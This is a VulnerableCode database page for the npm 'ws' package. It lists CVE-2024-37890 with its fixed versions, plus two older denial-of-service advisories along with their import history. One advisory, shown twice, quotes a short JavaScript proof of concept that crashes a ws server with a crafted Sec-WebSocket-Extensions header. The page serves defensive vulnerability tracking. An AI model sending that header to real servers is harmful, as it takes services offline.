VulnerableCode Package Details

Search for packages

Vulnerability	Summary	Fixed by
VCID-h5b4-kz93-r7g3 Aliases: CVE-2024-37890 GHSA-3h5v-q93c-6h6q		5.2.4 Affected by 0 other vulnerabilities. 6.2.3 Affected by 0 other vulnerabilities. 7.5.10 Affected by 0 other vulnerabilities. 8.17.1 Affected by 0 other vulnerabilities.

Vulnerability

Summary

Fixed by

VCID-h5b4-kz93-r7g3
Aliases:
CVE-2024-37890
GHSA-3h5v-q93c-6h6q

5.2.4
Affected by 0 other vulnerabilities.

6.2.3
Affected by 0 other vulnerabilities.

7.5.10
Affected by 0 other vulnerabilities.

8.17.1
Affected by 0 other vulnerabilities.

Vulnerability	Summary	Aliases
VCID-4851-mkc2-pqdw	Denial of Service A specially crafted value of the `Sec-WebSocket-Extensions` header that uses `Object.prototype` property names as extension or parameter names can be used to make a `ws` server crash.	GMS-2017-331
VCID-4u5m-kp7t-x3cf	Denial of Service in ws Affected versions of `ws` can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent. ## Proof of concept ``` const WebSocket = require('ws'); const net = require('net'); const wss = new WebSocket.Server({ port: 3000 }, function () { const payload = 'constructor'; // or ',;constructor' const request = [ 'GET / HTTP/1.1', 'Connection: Upgrade', 'Sec-WebSocket-Key: test', 'Sec-WebSocket-Version: 8', `Sec-WebSocket-Extensions: ${payload}`, 'Upgrade: websocket', '\r' ].join('\r'); const socket = net.connect(3000, function () { socket.resume(); socket.write(request); }); }); ``` ## Recommendation Update to version 3.3.1 or later.	GHSA-5v72-xg48-5rpm GMS-2019-145

Vulnerability

Summary

Aliases

VCID-4851-mkc2-pqdw

Denial of Service A specially crafted value of the `Sec-WebSocket-Extensions` header that uses `Object.prototype` property names as extension or parameter names can be used to make a `ws` server crash.

GMS-2017-331

VCID-4u5m-kp7t-x3cf

Denial of Service in ws Affected versions of `ws` can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent. ## Proof of concept ``` const WebSocket = require('ws'); const net = require('net'); const wss = new WebSocket.Server({ port: 3000 }, function () { const payload = 'constructor'; // or ',;constructor' const request = [ 'GET / HTTP/1.1', 'Connection: Upgrade', 'Sec-WebSocket-Key: test', 'Sec-WebSocket-Version: 8', `Sec-WebSocket-Extensions: ${payload}`, 'Upgrade: websocket', '\r' ].join('\r'); const socket = net.connect(3000, function () { socket.resume(); socket.write(request); }); }); ``` ## Recommendation Update to version 3.3.1 or later.

GHSA-5v72-xg48-5rpm
GMS-2019-145

Date	Actor	Action	Vulnerability	Source	VulnerableCode Version
2026-06-01T08:07:54.743729+00:00	GitLab Importer	Affected by	VCID-h5b4-kz93-r7g3	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/ws/CVE-2024-37890.yml	38.6.0
2026-05-31T11:19:33.128968+00:00	GithubOSV Importer	Fixing	VCID-4u5m-kp7t-x3cf	https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-5v72-xg48-5rpm/GHSA-5v72-xg48-5rpm.json	38.6.0
2026-05-31T00:51:42.051250+00:00	GHSA Importer	Fixing	VCID-4u5m-kp7t-x3cf	https://github.com/advisories/GHSA-5v72-xg48-5rpm	38.6.0
2026-05-30T20:55:11.120833+00:00	GitLab Importer	Fixing	VCID-4u5m-kp7t-x3cf	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/ws/GMS-2019-145.yml	38.6.0
2026-05-30T20:53:13.530503+00:00	GitLab Importer	Fixing	VCID-4851-mkc2-pqdw	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/ws/GMS-2017-331.yml	38.6.0